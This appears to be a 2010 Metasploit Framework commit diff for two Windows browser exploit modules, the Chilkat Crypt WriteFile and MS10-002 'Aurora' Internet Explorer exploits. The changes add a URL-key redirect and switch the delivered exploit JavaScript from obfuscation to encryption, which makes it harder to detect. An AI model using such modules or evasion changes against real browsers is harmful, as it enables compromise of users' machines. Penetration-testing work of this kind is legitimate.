fix aurora encrypt and add js_encrypt to chilikat module

git-svn-id: file:///home/svn/framework3/trunk@9185 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-01 02:31:17 +00:00 · 2010-05-01 02:31:17 +00:00 · ce372f62ff
parent 2662055be8
commit ce372f62ff
2 changed files with 20 additions and 6 deletions
--- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
+++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb
@ -52,6 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultTarget'  => 0))

+		@javascript_encode_key = rand_text_alpha(rand(10) + 10)
 	end

 	def autofilter
@ -64,6 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote

 	def on_request_uri(cli, request)

+		if (!request.uri.match(/\?\w+/))
+			send_local_redirect(cli, "?#{@javascript_encode_key}")
+			return
+		end
+
 		# Set parameters
 		fnname = rand_text_alpha(8+rand(8))
 		si_name = "msinfo" # must be this, other names don't seem to work
@ -107,6 +113,7 @@ window.location = "#{hcp_url}";
 }
 |

+=begin
 		# Obfuscate the javascript
 		opts = {
 			'Strings' => false, # didn't work in this case
@ -116,6 +123,8 @@ window.location = "#{hcp_url}";
 		}
 		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
 		js.obfuscate()
+=end
+		js = encrypt_js(js, @javascript_encode_key)

 		# Build the final HTML
 		content = %Q|<html>
--- a/modules/exploits/windows/browser/ms10_002_aurora.rb
+++ b/modules/exploits/windows/browser/ms10_002_aurora.rb
@ -30,12 +30,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Internet Explorer "Aurora" Memory Corruption',
 			'Description'    => %q{
-				This module exploits a memory corruption flaw in Internet Explorer. This
-			flaw was found in the wild and was a key component of the "Operation Aurora"
-			attacks that lead to the compromise of a number of high profile companies. The
-			exploit code is a direct port of the public sample published to the Wepawet
-			malware analysis site. The technique used by this module is currently identical
-			to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
+					This module exploits a memory corruption flaw in Internet Explorer. This
+				flaw was found in the wild and was a key component of the "Operation Aurora"
+				attacks that lead to the compromise of a number of high profile companies. The
+				exploit code is a direct port of the public sample published to the Wepawet
+				malware analysis site. The technique used by this module is currently identical
+				to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@ -86,6 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end

+		if (!request.uri.match(/\?\w+/))
+			send_local_redirect(cli, "?#{@javascript_encode_key}")
+			return
+		end
+
 		var_boom       = rand_text_alpha(rand(100) + 1)

 		var_element    = rand_text_alpha(rand(100) + 1)